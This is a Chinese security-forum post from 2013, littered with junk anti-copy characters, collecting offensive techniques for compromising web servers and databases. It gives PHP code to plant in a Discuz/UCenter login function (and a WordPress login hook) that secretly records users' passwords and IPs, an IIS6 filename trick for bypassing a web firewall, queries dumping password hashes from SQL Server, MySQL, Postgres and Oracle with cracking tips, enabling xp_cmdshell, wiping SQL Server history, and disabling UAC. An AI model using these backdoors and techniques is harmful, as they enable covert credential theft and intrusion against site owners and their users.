当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。5 g$ _: S* @. g
就是搜索case ‘login’
0 @2 Y" ~) y6 Y0 V Z% f在它下面直接插入即可,记录的密码生成在pwd.txt中,
! G' Q$ [6 K4 i" ?; y2 z, n, A其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
% O6 m& U" h! }9 F5 N利用II6文件解析漏洞绕过安全狗代码:
( z7 j: h, z. T;antian365.asp;antian365.jpg
5 z* H3 S- K; a- F3 z: e6 T5 N; t. V. E, L
各种类型数据库抓HASH破解最高权限密码!
$ B1 k/ e& C; c8 T! e9 _, Q1.sql server20004 G& r, v7 l5 p+ {
SELECT password from master.dbo.sysxlogins where name='sa'
) C' B1 x& Z/ A8 y$ \- [5 G0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
d' x1 @, U# p, y: x& w7 w) m2FD54D6119FFF04129A1D72E7C3194F7284A7F3A: `* Z& \1 L2 A
9 w6 `% J1 f7 e1 E0×0100- constant header
( ~" _3 q$ W0 t1 R, d34767D5C- salt
. ]+ x/ c2 k- O2 h" a0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash7 ^; O; u. q9 _8 W" d9 H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash" b) ?, E; V" Q+ a* P
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash4 t% N2 x" V! u0 t; z- _1 b
SQL server 2005:-! W" {$ P1 y V$ `
SELECT password_hash FROM sys.sql_logins where name='sa'; |7 L( L. |6 P: d9 u& }
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F k) M' N5 h! G6 u) ^
0×0100- constant header
( Y+ `/ T3 M: G2 r( h {993BF231-salt
! e9 E# w: H% q5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash; G0 N' l, Y6 J) }/ ?! A
crack case sensitive hash in cain, try brute force and dictionary based attacks.& k# ?/ ]+ X$ c' E
$ Z' i9 j; Y& _. p
update:- following bernardo’s comments:-
3 B9 v& q+ E! ~0 L/ z4 Luse function fn_varbintohexstr() to cast password in a hex string.
' [! q% {0 {" [; U/ W9 Je.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins3 l$ y4 u3 @0 N0 G
$ g, v6 p" T; N9 v% gMYSQL:-
$ r, I- W8 }5 E" i+ F Q& O/ R, A9 w7 R1 q+ L9 H. {2 Q$ }
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.+ u0 c9 t$ F i7 T- F% q4 a$ \0 e2 A
, W2 ~7 d# Z3 u" O3 y2 i
*mysql < 4.11 b5 G( H( ^$ M6 g. `' I
) r5 _) ~$ L, h7 m/ o. E
mysql> SELECT PASSWORD(‘mypass’);
- M1 @8 n- A9 }+——————–+
! \6 r9 H/ b8 v& B3 y/ @# \| PASSWORD(‘mypass’) |( x# a; Q7 s! ]
+——————–+
% t6 b) x2 @5 |$ u s7 r| 6f8c114b58f2ce9e |
3 Y/ e: u ~. s; y+——————–+; h# ?& ?4 S+ f$ K
' S$ d$ W d9 Y" E; \
*mysql >=4.1
4 C3 W) w$ d/ ^5 ]- M. ~) p, P6 Y: \4 t) B' N0 J
mysql> SELECT PASSWORD(‘mypass’);
% f1 ?; ~' f* \, A+——————————————-+
* i4 R: }7 \0 `$ ]| PASSWORD(‘mypass’) |
: V+ |! o5 Q: d! |2 i+——————————————-+& B, `6 v) k: ~) j" v6 q+ f
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
6 g* X* P% J/ z; H2 s( \4 ]+——————————————-+
8 Y! [/ Q" h2 `5 c0 ~% L, ]% v8 l5 E2 }) K* N' Z* Q1 l
Select user, password from mysql.user
! W; L0 r% n8 c( y# B/ `4 EThe hashes can be cracked in ‘cain and abel’
# w/ K$ W# T* I
6 k' J! L5 T/ WPostgres:-; _* q: Z# O. }0 C
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”), G- ?2 j$ \9 p, F. ]' {
select usename, passwd from pg_shadow;
9 G) Y6 Y7 G6 r4 X, eusename | passwd7 @$ ]& \7 N/ z0 n( C' X. n& H* M
——————+————————————-
- R7 m' |9 p2 z, \" Q% `0 W. z5 [- Ltestuser | md5fabb6d7172aadfda4753bf0507ed4396
, I3 `2 M" O! t' D) _1 z$ Kuse mdcrack to crack these hashes:-
/ S3 M2 g! [3 Z+ w; O" A9 w$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396" v$ @& O- D; A# j- z. @
6 m. G; v+ l- d0 |; ^$ EOracle:-
$ K, q, A; m5 C. o, j1 v. qselect name, password, spare4 from sys.user$4 a. @7 ?) u; U* r- \" D% m S! f
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
0 U5 R6 N/ w- m" yMore on Oracle later, i am a bit bored….
, E7 o+ _5 U9 H1 O6 R; W8 V$ z8 i6 h5 ~$ _- C* }; v) `
' e9 _, C+ z! I
在sql server2005/2008中开启xp_cmdshell5 |- K3 C7 l, Y
-- To allow advanced options to be changed.
5 g8 Q% U/ d# K, G6 \EXEC sp_configure 'show advanced options', 1
9 z) l8 \0 x( i; D) o: [GO# b$ }* o' d7 A1 m5 {: Q* I
-- To update the currently configured value for advanced options.4 T3 c. m2 D7 Y* R3 d
RECONFIGURE
" ]) O- D e/ H: P+ NGO
. x' Q$ P, b7 k' g" o3 e$ B-- To enable the feature.
5 b- x) U6 O8 M ZEXEC sp_configure 'xp_cmdshell', 1
3 B. U( `7 M3 ?$ ]GO
0 U0 D& L8 {8 h- S6 U-- To update the currently configured value for this feature." y3 F( Z: A- J1 o
RECONFIGURE
8 V8 j( y& D6 IGO
* Y1 t) T! ? Y6 F6 K9 U* rSQL 2008 server日志清除,在清楚前一定要备份。! q( H5 a* C$ i" m, z! K! p
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:' W5 F- h9 \+ o
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin) J/ u% D0 ~5 b- P- A5 |
5 ^% @; B0 ?" K1 N( c对于SQL Server 2008以前的版本:
8 k) E a# Y5 ?/ v$ J! q1 GSQL Server 2005:3 q; ]9 T: C8 s/ Y& B. M
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat u( V" F+ h4 |2 F" S
SQL Server 2000:
; D: J! M& @% {9 d+ r7 x4 L3 y* H清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
& A8 Q( ]0 U8 ^2 V7 v# A. D/ t( D6 S. m# ]: t" s. R
本帖最后由 simeon 于 2013-1-3 09:51 编辑" k4 c0 c$ c- \/ v. i5 w0 s
* _7 d( R- A/ d. N& X; p$ C4 Z
. A, j' B) m$ p- S+ B" D% N
windows 2008 文件权限修改# M0 Y3 y X. U/ r$ X2 \
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
& r" L( r+ H( A2 l& S5 F2 {2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98/ M0 A1 P! O/ l8 E
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
: M: m3 h8 t/ o+ j1 _
- ^$ X& f7 E: M& G# C& VWindows Registry Editor Version 5.00
. @- \8 ]! U+ ~- \' Z; ~, N7 A[HKEY_CLASSES_ROOT\*\shell\runas]
! E+ ]1 c2 j+ q) |. Z1 D@="管理员取得所有权"
8 s7 T* ~" k" p7 d( _"NoWorkingDirectory"=""
" w& g, C1 E3 g, j[HKEY_CLASSES_ROOT\*\shell\runas\command]
/ j, j7 K Z( p& z/ S1 ~@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
1 M; |2 a7 [' h6 q8 f- Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- }. V9 H) z: N+ o2 M3 R6 E
[HKEY_CLASSES_ROOT\exefile\shell\runas2]" N# H& t" h7 @* Z. e. U
@="管理员取得所有权"
: N' m% |5 j+ L% m0 |"NoWorkingDirectory"=""# w" _5 z# M0 }9 Z
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
2 }6 s: r x8 P& Z+ m- V@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 A% `) k2 P. v"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- y# s; W I9 \# e/ `% X# n5 x r2 o, O
[HKEY_CLASSES_ROOT\Directory\shell\runas]
( ]8 ]8 b8 S1 y1 t x% I) K/ i8 I@="管理员取得所有权"
& ]6 l$ f( E0 {! K" u/ c"NoWorkingDirectory"="", _8 \* }/ L6 w8 d4 X: Q/ b
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
: b, m: h1 A5 j4 H1 u- M@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 g/ A& G( x" j2 b
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
& U5 J9 l7 d0 |# i) u% m9 U+ Q$ A) A9 E( o1 g. }/ K6 u; I% X: Q
& P2 N9 D, {! L% m0 l: lwin7右键“管理员取得所有权”.reg导入; V) z3 w Q0 S# X/ f4 T+ \
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
3 e/ a2 N/ f: _5 ~2 f2 g1、C:\Windows这个路径的“notepad.exe”不需要替换
3 M2 V8 M' w7 u' _2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
. V$ w l) H4 Q' k, v2 k$ B3、四个“notepad.exe.mui”不要管
+ [& I- ^* s1 p0 ^1 I4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: T2 w2 Q" K3 a7 G1 X* iC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
$ h1 H- Y& ^! I替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
+ b3 Z3 `4 ?5 i1 `; r替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
" G! c0 K7 l |' L n% g; B! V jwindows 2008中关闭安全策略:
, N' l; i) t ~2 O# M' {) Z) Jreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+ e& i+ Z6 ^8 r修改uc_client目录下的client.php 在
' v" \0 u: ?, \! j Bfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {8 d' d) {2 z& D. O0 Z" \5 E6 }
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php, l& {: E7 {0 B! J8 P
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
" E( Q4 j% x* Q' B. R" bif(getenv('HTTP_CLIENT_IP')) {- j' C. Q& C" ^! @
$onlineip = getenv('HTTP_CLIENT_IP');
4 k8 \: A7 [& T3 F+ b$ l; l} elseif(getenv('HTTP_X_FORWARDED_FOR')) { D& F" J5 c/ M+ Q" U
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
" W/ u0 b* [7 b) }& C} elseif(getenv('REMOTE_ADDR')) {
% H1 _ u+ q& L( H$onlineip = getenv('REMOTE_ADDR');
0 t$ E; o4 x0 y1 s9 v} else {
9 \, v/ b0 Y( W9 R& _$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];4 H8 H! C' f2 M% G/ f8 a
}6 i5 b' v; J% y% |% W) x1 s" ?0 m
$showtime=date("Y-m-d H:i:s");
- V6 J& P; d# o6 U $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
) r% t* l( a3 M& g' K: o* ] $handle=fopen('./data/cache/csslog.php','a+');0 |3 p0 K3 i* Q4 k9 b% M ?+ a, _
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对